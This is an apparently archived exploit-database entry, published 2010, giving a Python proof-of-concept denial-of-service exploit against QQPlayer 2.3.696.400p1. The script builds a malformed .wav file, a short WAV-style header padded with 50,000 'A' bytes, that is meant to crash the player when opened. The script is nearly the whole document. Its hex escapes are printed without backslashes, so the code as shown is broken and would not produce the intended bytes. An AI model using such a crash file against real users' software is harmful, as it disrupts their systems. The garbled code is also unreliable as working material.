QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability
# Published : 2010-09-07
# Author : hadji samir
# Previous Title : Internet Download Accelerator 5.8 Remote Buffer Overflow PoC
# Next Title : MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

#!/usr/bin/python
#
###########################################################################################		
# Exploit Title:  QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability       
# Date:		  07-09-2010                                                            
# Author:	  Hadji Samir   , s-Dz[at]hotmail[dot]fr                                
# Software Link:  www.qq.com                                                            
# Version:        QQPlayer 2.3.696.400p1                                                
# Tested on:	  Windows XP sp2                                                        
# CVE :                                                                                 
# Notes:	  Working with filetype Mahboul-3lik.wav (.mp3,.3gp,.avi...)           
#                 Samir tjrs mahboul-3lik ...                                           
#                                                                                                                                
###########################################################################################	
  
boom =("x52x49x46x46x24x80x03x20x57x41x56x45x20")
buff = ("x41" * 50000 )
wizz = open("Mahboul-3lik.wav","w") 
wizz.write(boom + buff ) 
wizz.close()